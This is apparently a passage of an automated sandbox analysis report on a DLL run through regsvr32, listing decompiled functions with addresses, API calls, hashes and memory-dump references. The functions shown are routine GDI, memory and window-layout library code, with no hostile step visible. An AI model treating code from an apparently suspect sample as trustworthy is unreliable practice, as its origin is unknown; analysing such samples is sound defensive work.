                                                                                                                • Instruction Fuzzy Hash: F8019E7C40065AEFEB44DBA0C949D9E7BE4EF88344B208468F905C3122DB34E88ACA55
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 1000C235 Relevance: 7.5, APIs: 5, Instructions: 38COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 100%
                                                                                                                			E1000C235(void* __ecx, int _a4) {
				int _t7;
				void* _t16;
				void* _t20;

				_t7 = SelectClipPath( *(__ecx + 4), _a4);
				if(_t7 != 0) {
					_t16 = 1;
					if( *(__ecx + 4) !=  *(__ecx + 8)) {
						_t20 = CreateRectRgn(0, 0, 0, 0);
						if(GetClipRgn( *(__ecx + 4), _t20) < 0 || SelectClipRgn( *(__ecx + 8), _t20) == 0) {
							_t16 = 0;
						}
						DeleteObject(_t20);
					}
					return _t16;
				}
				return _t7;
			}






                                                                                                                0x1000c23f
                                                                                                                0x1000c247
                                                                                                                0x1000c24f
                                                                                                                0x1000c253
                                                                                                                0x1000c264
                                                                                                                0x1000c272
                                                                                                                0x1000c282
                                                                                                                0x1000c282
                                                                                                                0x1000c285
                                                                                                                0x1000c28b
                                                                                                                0x00000000
                                                                                                                0x1000c28e
                                                                                                                0x1000c290

                                                                                                                APIs
                                                                                                                • SelectClipPath.GDI32(?,?), ref: 1000C23F
                                                                                                                • CreateRectRgn.GDI32(00000000,00000000,00000000,00000000), ref: 1000C25E
                                                                                                                • GetClipRgn.GDI32(?,00000000), ref: 1000C26A
                                                                                                                • SelectClipRgn.GDI32(?,00000000), ref: 1000C278
                                                                                                                • DeleteObject.GDI32(00000000), ref: 1000C285
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Clip$Select$CreateDeleteObjectPathRect
                                                                                                                • String ID:
                                                                                                                • API String ID: 1230964757-0
                                                                                                                • Opcode ID: c5a595ff58a55da9221d8328392afdc812a962fa1ed36d5cdbb8174e9c783db7
                                                                                                                • Instruction ID: 47a7a4d585018c910710f035c3deb9cf876d6beea01288e339afd1202d7d3335
                                                                                                                • Opcode Fuzzy Hash: c5a595ff58a55da9221d8328392afdc812a962fa1ed36d5cdbb8174e9c783db7
                                                                                                                • Instruction Fuzzy Hash: B2F01D31241311AFF360AFA1CE89F17BBA9EB46B91F018828F546D2570CBA0AC04CA20
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 10020B1B Relevance: 7.5, APIs: 5, Instructions: 35COMMONLIBRARYCODE
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 100%
                                                                                                                			E10020B1B(long* __ecx) {
				intOrPtr _t4;
				long _t5;
				void* _t6;
				void* _t13;
				intOrPtr _t14;
				long* _t15;

				_t15 = __ecx;
				_t4 =  *((intOrPtr*)(__ecx + 0x14));
				if(_t4 != 0) {
					do {
						_t14 =  *((intOrPtr*)(_t4 + 4));
						E10020973(__ecx, _t4, 0);
						_t4 = _t14;
					} while (_t14 != 0);
				}
				_t5 =  *_t15;
				if(_t5 != 0xffffffff) {
					TlsFree(_t5);
				}
				_t6 = _t15[4];
				if(_t6 != 0) {
					_t13 = GlobalHandle(_t6);
					GlobalUnlock(_t13);
					_t6 = GlobalFree(_t13);
				}
				DeleteCriticalSection( &(_t15[7]));
				return _t6;
			}









                                                                                                                0x10020b1c
                                                                                                                0x10020b1e
                                                                                                                0x10020b24
                                                                                                                0x10020b26
                                                                                                                0x10020b26
                                                                                                                0x10020b2e
                                                                                                                0x10020b35
                                                                                                                0x10020b35
                                                                                                                0x10020b26
                                                                                                                0x10020b39
                                                                                                                0x10020b3e
                                                                                                                0x10020b41
                                                                                                                0x10020b41
                                                                                                                0x10020b47
                                                                                                                0x10020b4c
                                                                                                                0x10020b55
                                                                                                                0x10020b58
                                                                                                                0x10020b5f
                                                                                                                0x10020b5f
                                                                                                                0x10020b69
                                                                                                                0x10020b71

                                                                                                                APIs
                                                                                                                • TlsFree.KERNEL32(?), ref: 10020B41
                                                                                                                • GlobalHandle.KERNEL32(?), ref: 10020B4F
                                                                                                                • GlobalUnlock.KERNEL32(00000000), ref: 10020B58
                                                                                                                • GlobalFree.KERNEL32(00000000), ref: 10020B5F
                                                                                                                • DeleteCriticalSection.KERNEL32 ref: 10020B69
                                                                                                                  • Part of subcall function 10020973: EnterCriticalSection.KERNEL32(?), ref: 100209D0
                                                                                                                  • Part of subcall function 10020973: LeaveCriticalSection.KERNEL32(?,?), ref: 100209E0
                                                                                                                  • Part of subcall function 10020973: LocalFree.KERNEL32(?), ref: 100209E9
                                                                                                                  • Part of subcall function 10020973: TlsSetValue.KERNEL32(?,00000000), ref: 100209FB
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CriticalFreeGlobalSection$DeleteEnterHandleLeaveLocalUnlockValue
                                                                                                                • String ID:
                                                                                                                • API String ID: 1549993015-0
                                                                                                                • Opcode ID: b01807da667867a865fc57cb7c327d3e1d9e9fe6a26b645f8b737c5b1a19c065
                                                                                                                • Instruction ID: 6cf608fd225a27a97259cdcb4c701323467a0350138c016028cf72fe5f14c0e7
                                                                                                                • Opcode Fuzzy Hash: b01807da667867a865fc57cb7c327d3e1d9e9fe6a26b645f8b737c5b1a19c065
                                                                                                                • Instruction Fuzzy Hash: FEF0E9356003209FE322DF38AD88E6B72FEEF86650B650149FD05C3252D734DC018660
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 1000BC25 Relevance: 7.5, APIs: 5, Instructions: 33COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 82%
                                                                                                                			E1000BC25(intOrPtr _a4) {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t8;
				void* _t9;
				void* _t15;
				void* _t17;
				intOrPtr _t20;

				_t20 = _a4;
				_t15 = GlobalLock( *(_t20 + 0xc));
				if(_t15 != 0) {
					_t8 = GlobalLock( *(_t20 + 8));
					__eflags = _t8;
					if(__eflags != 0) {
						_push(_t8);
						_push(_t15);
						_t9 = E1000BA16(_t15, _t17, GlobalLock, _t20, __eflags);
						GlobalUnlock( *(_t20 + 0xc));
						GlobalUnlock( *(_t20 + 8));
						return _t9;
					}
					GlobalUnlock( *(_t20 + 0xc));
				}
				return 0;
			}











                                                                                                                0x1000bc27
                                                                                                                0x1000bc37
                                                                                                                0x1000bc3b
                                                                                                                0x1000bc44
                                                                                                                0x1000bc46
                                                                                                                0x1000bc48
                                                                                                                0x1000bc55
                                                                                                                0x1000bc56
                                                                                                                0x1000bc57
                                                                                                                0x1000bc67
                                                                                                                0x1000bc6c
                                                                                                                0x00000000
                                                                                                                0x1000bc6e
                                                                                                                0x1000bc4d
                                                                                                                0x1000bc4d
                                                                                                                0x00000000

                                                                                                                APIs
                                                                                                                • GlobalLock.KERNEL32 ref: 1000BC35
                                                                                                                • GlobalLock.KERNEL32 ref: 1000BC44
                                                                                                                • GlobalUnlock.KERNEL32(?), ref: 1000BC4D
                                                                                                                  • Part of subcall function 1000BA16: __EH_prolog3_GS.LIBCMT ref: 1000BA1D
                                                                                                                  • Part of subcall function 1000BA16: __alloca_probe_16.LIBCMT ref: 1000BAFA
                                                                                                                  • Part of subcall function 1000BA16: CoTaskMemAlloc.OLE32(?), ref: 1000BB41
                                                                                                                • GlobalUnlock.KERNEL32(?), ref: 1000BC67
                                                                                                                • GlobalUnlock.KERNEL32(?), ref: 1000BC6C
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Global$Unlock$Lock$AllocH_prolog3_Task__alloca_probe_16
                                                                                                                • String ID:
                                                                                                                • API String ID: 1323298786-0
                                                                                                                • Opcode ID: 6498b7e41d7b98b0c12b49beaeabd060f1d80820e3d9cf9becf0d3cf71dd153b
                                                                                                                • Instruction ID: c600b051740266f3091284cb5df07c1a2b98d22017044a12e2a4374295ff7298
                                                                                                                • Opcode Fuzzy Hash: 6498b7e41d7b98b0c12b49beaeabd060f1d80820e3d9cf9becf0d3cf71dd153b
                                                                                                                • Instruction Fuzzy Hash: 00F08275200A05AFF720AF65CC84C07B7EDEF952903158835FA5192130DB31EC109A10
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 100246AA Relevance: 7.5, APIs: 5, Instructions: 27COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 25%
                                                                                                                			E100246AA(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t21;
				intOrPtr* _t23;
				void* _t24;

				E1004764D(0x1008f78c, __ebx, __edi, __esi);
				_t21 =  *((intOrPtr*)(_t24 + 0xc));
				_t23 = __imp__#7;
				 *(_t24 - 4) =  *(_t24 - 4) & 0x00000000;
				E1002285D(__ebx,  *((intOrPtr*)(_t24 + 8)), _t21, _t24,  *_t23(_t21, 0));
				_push(_t21);
				if( *_t23() > 0) {
					E10022B9D( *((intOrPtr*)(_t24 + 8)), _t21, _t21,  *_t23(_t21) + _t14);
				}
				__imp__#6(_t21);
				return E10047725( *((intOrPtr*)(_t24 + 8)));
			}






                                                                                                                0x100246b1
                                                                                                                0x100246b6
                                                                                                                0x100246b9
                                                                                                                0x100246bf
                                                                                                                0x100246ca
                                                                                                                0x100246cf
                                                                                                                0x100246d4
                                                                                                                0x100246e0
                                                                                                                0x100246e0
                                                                                                                0x100246e6
                                                                                                                0x100246f4

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: String$FreeH_prolog3
                                                                                                                • String ID:
                                                                                                                • API String ID: 315669285-0
                                                                                                                • Opcode ID: 1f65b4bf3e8025871e6c3f7dba31e3d88d0171a9be26f73c8f8c0b216a005208
                                                                                                                • Instruction ID: 9c161dffb03ac8c6011b1bdbd1b2ee79063cf2212ae75fd4fa33748ab2b7d01d
                                                                                                                • Opcode Fuzzy Hash: 1f65b4bf3e8025871e6c3f7dba31e3d88d0171a9be26f73c8f8c0b216a005208
                                                                                                                • Instruction Fuzzy Hash: 1DE06D39900118BBEB01EB74CC85FBE3BB8EF86780F404059F904E7241CB34A9129AA9
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 1003F212 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 319COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 67%
                                                                                                                			E1003F212(intOrPtr* __ecx, intOrPtr* _a4, signed int _a8, signed int _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				intOrPtr* _v20;
				signed int _v24;
				intOrPtr* _v28;
				signed int _v32;
				struct tagRECT _v48;
				struct tagRECT _v64;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t181;
				intOrPtr _t182;
				intOrPtr _t185;
				signed char _t187;
				intOrPtr* _t189;
				signed char _t193;
				signed int _t196;
				intOrPtr* _t210;
				intOrPtr _t213;
				intOrPtr* _t214;
				signed int _t223;
				signed int _t230;
				intOrPtr* _t232;
				void* _t243;
				intOrPtr _t257;
				signed int _t264;
				signed int _t273;
				signed int _t276;
				signed int _t278;
				intOrPtr* _t281;
				intOrPtr _t282;
				intOrPtr* _t286;
				void* _t290;
				intOrPtr _t291;
				intOrPtr* _t293;

				_t281 = _a4;
				_push(0);
				_t232 = __ecx;
				_push(0);
				_push(0x418);
				_v8 = 0;
				 *_t281 = 0;
				 *((intOrPtr*)(_t281 + 4)) = 0;
				 *((intOrPtr*)( *__ecx + 0x110))();
				_v16 = 0;
				if(0 != 0) {
					_t276 = 0x14;
					_t277 = 0 * _t276 >> 0x20;
					_t185 = E10009F14(0,  ~0x00BADBAD | 0 * _t276);
					_t290 = 0;
					_v8 = _t185;
					if(_v16 > 0) {
						_t282 = _t185;
						do {
							E1003DEA1(_t232, _t290, _t282);
							_t290 = _t290 + 1;
							_t282 = _t282 + 0x14;
						} while (_t290 < _v16);
						_t291 = _v16;
						_t281 = _a4;
						_t243 = 0;
						if(_t291 > 0) {
							_t187 =  *(_t232 + 0x80);
							if((_t187 & 0x00000002) == 0) {
								_t277 = _t187 & 0x00000004;
								if((_t187 & 0x00000004) == 0) {
									L20:
									_push(_t243);
									asm("sbb eax, eax");
									_t223 =  ~(_a8 & 0x00000002) & 0x00007fff;
									__eflags = _t223;
									_push(_t223);
								} else {
									if((_a8 & 0x00000004) == 0) {
										__eflags = _a8 & 0x00000008;
										if((_a8 & 0x00000008) == 0) {
											__eflags = _a8 & 0x00000010;
											if((_a8 & 0x00000010) == 0) {
												__eflags = _a12 - 0xffffffff;
												if(_a12 == 0xffffffff) {
													__eflags = _t187 & 0x00000001;
													if((_t187 & 0x00000001) != 0) {
														goto L8;
													} else {
														goto L20;
													}
												} else {
													SetRectEmpty( &_v48);
													 *((intOrPtr*)( *_t232 + 0x140))( &_v48, _a8 & 0x00000002);
													_t230 = _a8 & 0x00000020;
													__eflags = _t230;
													if(_t230 == 0) {
														_t273 = _v48.right - _v48.left;
														__eflags = _t273;
													} else {
														_t273 = _v48.bottom - _v48.top;
													}
													_push(_t230);
													_t243 = _t273 + _a12;
													goto L13;
												}
											} else {
												_push(0);
												L13:
												_push(_t243);
											}
										} else {
											_push(0);
											_push(0x7fff);
										}
									} else {
										L8:
										_push(_t243);
										_push( *((intOrPtr*)(_t232 + 0x70)));
									}
								}
								_push(_t291);
								_push(_v8);
								E1003E9C6(_t232, _t277);
							}
							_t189 = E1003E897(_t232,  &(_v48.right), _v8, _t291);
							 *_t281 =  *_t189;
							 *((intOrPtr*)(_t281 + 4)) =  *((intOrPtr*)(_t189 + 4));
							if((_a8 & 0x00000040) != 0) {
								_v24 = 0;
								_a12 = 0;
								_v48.bottom =  *((intOrPtr*)(_t232 + 0xa0));
								 *((intOrPtr*)(_t232 + 0xa0)) = 0;
								if(_t291 > 0) {
									_t210 = _v8 + 4;
									_v28 = _t210;
									_t257 = _t291;
									do {
										if(( *(_t210 + 5) & 0x00000001) != 0 &&  *_t210 != 0) {
											_a12 = _a12 + 1;
										}
										_t210 = _t210 + 0x14;
										_t257 = _t257 - 1;
									} while (_t257 != 0);
									_t314 = _a12;
									if(_a12 > 0) {
										_t278 = 0x18;
										_t213 = E10009F14(_t314,  ~(0 | _t314 > 0x00000000) | _a12 * _t278);
										_t73 = _t213 + 8; // 0x8
										_t286 = _t73;
										_v24 = _t213;
										_t214 = _v28;
										_v32 = _a12;
										_t264 = 0;
										_a12 = 0;
										_v12 = 0;
										_v20 = _t286;
										_v28 = _t214;
										while(1) {
											_t277 = _v32;
											if(_a12 >= _v32) {
												break;
											}
											if(( *(_t214 + 5) & 0x00000001) != 0 &&  *_t214 != 0) {
												 *((intOrPtr*)(_t286 - 8)) = _t264;
												_t277 =  &_v64;
												 *((intOrPtr*)(_t286 - 4)) =  *_t214;
												 *((intOrPtr*)( *_t232 + 0x170))(_t264,  &_v64);
												E1000C931(_t232,  &_v64);
												_a12 = _a12 + 1;
												_v20 = _v20 + 0x18;
												_t264 = _v12;
												_t214 = _v28;
												asm("movsd");
												asm("movsd");
												asm("movsd");
												asm("movsd");
												_t286 = _v20;
											}
											_t264 = _t264 + 1;
											_t214 = _t214 + 0x14;
											_v12 = _t264;
											_v28 = _t214;
											if(_t264 < _v16) {
												continue;
											}
											break;
										}
										_t291 = _v16;
										_t281 = _a4;
									}
								}
								_t193 =  *(_t232 + 0x80);
								if((_t193 & 0x00000001) != 0 && (_t193 & 0x00000004) != 0) {
									 *((intOrPtr*)(_t232 + 0x70)) =  *_t281;
								}
								_v12 = _v12 & 0x00000000;
								_t323 = _t291;
								if(_t291 > 0) {
									_v20 = _v8;
									do {
										E1003E699(_t232, _t277, _t323, _v12, _v20);
										_v12 = _v12 + 1;
										_v20 = _v20 + 0x14;
									} while (_v12 < _t291);
								}
								if(_a12 > 0) {
									_t293 = _v24 + 8;
									_v20 = _t293;
									do {
										_t196 = E1001768F(_t232,  *((intOrPtr*)(_t293 - 4)));
										_v32 = _t196;
										if(_t196 != 0) {
											GetWindowRect( *(_t196 + 0x20),  &_v64);
											 *((intOrPtr*)( *_t232 + 0x170))( *((intOrPtr*)(_v20 - 8)),  &_v64);
											E10017C59(_v32, 0, _v64.left -  *_t293 + _v64.left, _v64.top -  *((intOrPtr*)(_t293 + 4)) + _v64.top, 0, 0, 0x15);
											_t293 = _v20;
											_t281 = _a4;
										}
										_t293 = _t293 + 0x18;
										_t142 =  &_a12;
										 *_t142 = _a12 - 1;
										_t329 =  *_t142;
										_v20 = _t293;
									} while ( *_t142 != 0);
									_push(_v24);
									E10009F3F(_t232, _t281, _t293, _t329);
								}
								 *((intOrPtr*)(_t232 + 0xa0)) = _v48.bottom;
							}
							_push(_v8);
							E10009F3F(_t232, _t281, _t291, _t329);
						}
					}
				}
				SetRectEmpty( &_v64);
				 *((intOrPtr*)( *_t232 + 0x140))( &_v64, _a8 & 0x00000002);
				 *((intOrPtr*)(_t281 + 4)) =  *((intOrPtr*)(_t281 + 4)) + _v64.top - _v64.bottom;
				 *_t281 =  *_t281 + _v64.left - _v64.right;
				E10042C79( &(_v48.right), _a8 & 0x00000001, _a8 & 0x00000002);
				_t181 =  *_t281;
				if(_t181 <= _v48.right) {
					_t181 = _v48.right;
				}
				 *_t281 = _t181;
				_t182 =  *((intOrPtr*)(_t281 + 4));
				if(_t182 <= _v48.bottom) {
					_t182 = _v48.bottom;
				}
				 *((intOrPtr*)(_t281 + 4)) = _t182;
				return _t281;
			}









































                                                                                                                0x1003f21d
                                                                                                                0x1003f220
                                                                                                                0x1003f221
                                                                                                                0x1003f225
                                                                                                                0x1003f226
                                                                                                                0x1003f22b
                                                                                                                0x1003f22e
                                                                                                                0x1003f230
                                                                                                                0x1003f233
                                                                                                                0x1003f23f
                                                                                                                0x1003f242
                                                                                                                0x1003f24a
                                                                                                                0x1003f24b
                                                                                                                0x1003f255
                                                                                                                0x1003f25a
                                                                                                                0x1003f260
                                                                                                                0x1003f263
                                                                                                                0x1003f269
                                                                                                                0x1003f26b
                                                                                                                0x1003f26f
                                                                                                                0x1003f274
                                                                                                                0x1003f275
                                                                                                                0x1003f278
                                                                                                                0x1003f27d
                                                                                                                0x1003f280
                                                                                                                0x1003f283
                                                                                                                0x1003f287
                                                                                                                0x1003f28d
                                                                                                                0x1003f295
                                                                                                                0x1003f29d
                                                                                                                0x1003f2a0
                                                                                                                0x1003f30d
                                                                                                                0x1003f314
                                                                                                                0x1003f315
                                                                                                                0x1003f317
                                                                                                                0x1003f317
                                                                                                                0x1003f31c
                                                                                                                0x1003f2a2
                                                                                                                0x1003f2a6
                                                                                                                0x1003f2ae
                                                                                                                0x1003f2b2
                                                                                                                0x1003f2bc
                                                                                                                0x1003f2c0
                                                                                                                0x1003f2c6
                                                                                                                0x1003f2ca
                                                                                                                0x1003f309
                                                                                                                0x1003f30b
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1003f2cc
                                                                                                                0x1003f2d0
                                                                                                                0x1003f2e5
                                                                                                                0x1003f2ee
                                                                                                                0x1003f2ee
                                                                                                                0x1003f2f1
                                                                                                                0x1003f2fe
                                                                                                                0x1003f2fe
                                                                                                                0x1003f2f3
                                                                                                                0x1003f2f6
                                                                                                                0x1003f2f6
                                                                                                                0x1003f301
                                                                                                                0x1003f305
                                                                                                                0x00000000
                                                                                                                0x1003f305
                                                                                                                0x1003f2c2
                                                                                                                0x1003f2c2
                                                                                                                0x1003f2c3
                                                                                                                0x1003f2c3
                                                                                                                0x1003f2c3
                                                                                                                0x1003f2b4
                                                                                                                0x1003f2b4
                                                                                                                0x1003f2b5
                                                                                                                0x1003f2b5
                                                                                                                0x1003f2a8
                                                                                                                0x1003f2a8
                                                                                                                0x1003f2a8
                                                                                                                0x1003f2a9
                                                                                                                0x1003f2a9
                                                                                                                0x1003f2a6
                                                                                                                0x1003f31d
                                                                                                                0x1003f31e
                                                                                                                0x1003f323
                                                                                                                0x1003f323
                                                                                                                0x1003f332
                                                                                                                0x1003f340
                                                                                                                0x1003f342
                                                                                                                0x1003f345
                                                                                                                0x1003f355
                                                                                                                0x1003f358
                                                                                                                0x1003f35b
                                                                                                                0x1003f35e
                                                                                                                0x1003f364
                                                                                                                0x1003f36d
                                                                                                                0x1003f370
                                                                                                                0x1003f373
                                                                                                                0x1003f375
                                                                                                                0x1003f379
                                                                                                                0x1003f380
                                                                                                                0x1003f380
                                                                                                                0x1003f383
                                                                                                                0x1003f386
                                                                                                                0x1003f386
                                                                                                                0x1003f389
                                                                                                                0x1003f38d
                                                                                                                0x1003f39a
                                                                                                                0x1003f3a5
                                                                                                                0x1003f3ae
                                                                                                                0x1003f3ae
                                                                                                                0x1003f3b1
                                                                                                                0x1003f3b4
                                                                                                                0x1003f3b7
                                                                                                                0x1003f3ba
                                                                                                                0x1003f3bc
                                                                                                                0x1003f3bf
                                                                                                                0x1003f3c2
                                                                                                                0x1003f3c5
                                                                                                                0x1003f3c8
                                                                                                                0x1003f3c8
                                                                                                                0x1003f3ce
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1003f3d4
                                                                                                                0x1003f3db
                                                                                                                0x1003f3e0
                                                                                                                0x1003f3e4
                                                                                                                0x1003f3ec
                                                                                                                0x1003f3f8
                                                                                                                0x1003f3fd
                                                                                                                0x1003f400
                                                                                                                0x1003f404
                                                                                                                0x1003f407
                                                                                                                0x1003f40d
                                                                                                                0x1003f40e
                                                                                                                0x1003f40f
                                                                                                                0x1003f410
                                                                                                                0x1003f411
                                                                                                                0x1003f411
                                                                                                                0x1003f414
                                                                                                                0x1003f415
                                                                                                                0x1003f41b
                                                                                                                0x1003f41e
                                                                                                                0x1003f421
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1003f421
                                                                                                                0x1003f423
                                                                                                                0x1003f426
                                                                                                                0x1003f426
                                                                                                                0x1003f38d
                                                                                                                0x1003f429
                                                                                                                0x1003f431
                                                                                                                0x1003f439
                                                                                                                0x1003f439
                                                                                                                0x1003f43c
                                                                                                                0x1003f440
                                                                                                                0x1003f442
                                                                                                                0x1003f447
                                                                                                                0x1003f44a
                                                                                                                0x1003f452
                                                                                                                0x1003f457
                                                                                                                0x1003f45a
                                                                                                                0x1003f45e
                                                                                                                0x1003f44a
                                                                                                                0x1003f467
                                                                                                                0x1003f473
                                                                                                                0x1003f476
                                                                                                                0x1003f47c
                                                                                                                0x1003f481
                                                                                                                0x1003f488
                                                                                                                0x1003f48b
                                                                                                                0x1003f494
                                                                                                                0x1003f4b7
                                                                                                                0x1003f4d3
                                                                                                                0x1003f4d8
                                                                                                                0x1003f4db
                                                                                                                0x1003f4db
                                                                                                                0x1003f4de
                                                                                                                0x1003f4e1
                                                                                                                0x1003f4e1
                                                                                                                0x1003f4e1
                                                                                                                0x1003f4e4
                                                                                                                0x1003f4e4
                                                                                                                0x1003f4e9
                                                                                                                0x1003f4ec
                                                                                                                0x1003f4f1
                                                                                                                0x1003f4f5
                                                                                                                0x1003f4f5
                                                                                                                0x1003f4fb
                                                                                                                0x1003f4fe
                                                                                                                0x1003f503
                                                                                                                0x1003f287
                                                                                                                0x1003f263
                                                                                                                0x1003f508
                                                                                                                0x1003f51d
                                                                                                                0x1003f52a
                                                                                                                0x1003f535
                                                                                                                0x1003f542
                                                                                                                0x1003f547
                                                                                                                0x1003f54c
                                                                                                                0x1003f54e
                                                                                                                0x1003f54e
                                                                                                                0x1003f551
                                                                                                                0x1003f553
                                                                                                                0x1003f559
                                                                                                                0x1003f55b
                                                                                                                0x1003f55b
                                                                                                                0x1003f55e
                                                                                                                0x1003f567

                                                                                                                APIs
                                                                                                                • SetRectEmpty.USER32(?), ref: 1003F508
                                                                                                                  • Part of subcall function 10009F14: _malloc.LIBCMT ref: 10009F2E
                                                                                                                • GetWindowRect.USER32 ref: 1003F494
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
